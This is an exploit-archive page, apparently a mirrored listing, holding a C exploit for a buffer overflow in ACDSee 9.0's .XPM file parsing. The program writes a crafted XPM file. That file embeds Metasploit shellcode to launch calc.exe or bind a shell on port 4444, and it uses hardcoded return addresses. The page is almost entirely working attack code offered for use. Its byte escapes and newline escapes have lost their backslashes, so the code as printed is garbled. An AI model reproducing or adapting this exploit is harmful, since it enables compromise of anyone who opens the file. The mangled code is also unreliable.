[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : ACDSee 9.0 (.XPM File) Local Buffer Overflow Exploit
# Published : 2007-04-22
# Author : Marsu
# Previous Title : Adobe Photoshop CS2 / CS3 Unspecified .BMP File Buffer Overflow Exploit
# Next Title : FreshView 7.15 (.PSP File) Buffer Overflow Exploit
/*****************************************************************************
* ACDSee v9.0 .XPM File Buffer Overflow *
* *
* *
* ACDSee is vulnerable to an unspecified buffer overflow when processing a *
* crafted .XPM file. *
* This exploit runs calc.exe or binds shell to port 4444, and works against *
* ACDSee and ACDSee Quick View. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr> *
*****************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13x98"
"x11xbexa7x83xebxfcxe2xf4x64xf9xfaxa7x98x11x35xe2"
"xa4x9axc2xa2xe0x10x51x2cxd7x09x35xf8xb8x10x55xee"
"x13x25x35xa6x76x20x7ex3ex34x95x7exd3x9fxd0x74xaa"
"x99xd3x55x53xa3x45x9axa3xedxf4x35xf8xbcx10x55xc1"
"x13x1dxf5x2cxc7x0dxbfx4cx13x0dx35xa6x73x98xe2x83"
"x9cxd2x8fx67xfcx9axfex97x1dxd1xc6xabx13x51xb2x2c"
"xe8x0dx13x2cxf0x19x55xaex13x91x0exa7x98x11x35xcf"
"xa4x4ex8fx51xf8x47x37x5fx1bxd1xc5xf7xf0x6fx66x45"
"xebx79x26x59x12x1fxe9x58x7fx72xdfxcbxfbx3fxdbxdf"
"xfdx11xbexa7";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char BindShellcode[] =
"x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x5c"
"x7bx78x7fx83xebxfcxe2xf4xa0x11x93x32xb4x82x87x80"
"xa3x1bxf3x13x78x5fxf3x3ax60xf0x04x7ax24x7ax97xf4"
"x13x63xf3x20x7cx7ax93x36xd7x4fxf3x7exb2x4axb8xe6"
"xf0xffxb8x0bx5bxbaxb2x72x5dxb9x93x8bx67x2fx5cx57"
"x29x9exf3x20x78x7ax93x19xd7x77x33xf4x03x67x79x94"
"x5fx57xf3xf6x30x5fx64x1ex9fx4axa3x1bxd7x38x48xf4"
"x1cx77xf3x0fx40xd6xf3x3fx54x25x10xf1x12x75x94x2f"
"xa3xadx1ex2cx3ax13x4bx4dx34x0cx0bx4dx03x2fx87xaf"
"x34xb0x95x83x67x2bx87xa9x03xf2x9dx19xddx96x70x7d"
"x09x11x7ax80x8cx13xa1x76xa9xd6x2fx80x8ax28x2bx2c"
"x0fx28x3bx2cx1fx28x87xafx3ax13x69x23x3ax28xf1x9e"
"xc9x13xdcx65x2cxbcx2fx80x8ax11x68x2ex09x84xa8x17"
"xf8xd6x56x96x0bx84xaex2cx09x84xa8x17xb9x32xfex36"
"x0bx84xaex2fx08x2fx2dx80x8cxe8x10x98x25xbdx01x28"
"xa3xadx2dx80x8cx1dx12x1bx3ax13x1bx12xd5x9ex12x2f"
"x05x52xb4xf6xbbx11x3cxf6xbex4axb8x8cxf6x85x3ax52"
"xa2x39x54xecxd1x01x40xd4xf7xd0x10x0dxa2xc8x6ex80"
"x29x3fx87xa9x07x2cx2ax2ex0dx2ax12x7ex0dx2ax2dx2e"
"xa3xabx10xd2x85x7exb6x2cxa3xadx12x80xa3x4cx87xaf"
"xd7x2cx84xfcx98x1fx87xa9x0ex84xa8x17xacxf1x7cx20"
"x0fx84xaex80x8cx7bx78x7f";
char XPMHeaders[]=
"x2fx2ax20x58x50x4dx20x2ax2fx0dx0ax73x74x61x74x69"
"x63x20x63x68x61x72x20x2ax50x69x78x6dx61x70x5bx5d"
"x20x3dx20x7bx0dx0ax22x35x30x39x20x34x33x38x20x32"
"x35x36x20x33x22x2cx0dx0ax22";
int main(int argc, char* argv[])
{
FILE* xpmfile;
char evilbuff[6600];
int offset=0;
printf("[+] ACDSee v9.0 .XPM File Buffer Overflown");
printf("[+] Coded and discovered by Marsu <Marsupilamipowa@hotmail.fr>n");
if (argc!=3) {
printf("[+] Usage: %s Mode <file.xpm>n",argv[0]);
printf("[+] Mode is 0 -> run calc.exen");
printf("[+] 1 -> bind shell to port 4444n");
return 0;
}
memset(evilbuff,'A',6600);
memcpy(evilbuff,XPMHeaders,sizeof(XPMHeaders)-1);
memcpy(evilbuff+0x1040,"x05x03x81x7C",4); //call ebx in kernel32. This one is for ACDsee9.exe
memcpy(evilbuff+0x10a4,"x90x90xebx16x2ax02xfcx7fx2ax02xfcx7f",12); //pop pop ret in ???. Works for ACDsee9.exe and ACDSeeQV.exe
if (!atoi(argv[1]))
memcpy(evilbuff+0x11a0,CalcShellcode,strlen(CalcShellcode));
else
memcpy(evilbuff+0x11a0,BindShellcode,strlen(BindShellcode));
//End of XPM file
memcpy(evilbuff+0x1916,"x22x0dx0ax29x3bx0dx0a",7);
if ((xpmfile=fopen(argv[2],"wb"))==0) {
printf("[-] Unable to access file.n");
return 0;
}
fwrite( evilbuff, 1, 6600, xpmfile );
fclose(xpmfile);
printf("[+] Done. Have fun!n");
return 0;
}
// www.Syue.com [2007-04-22]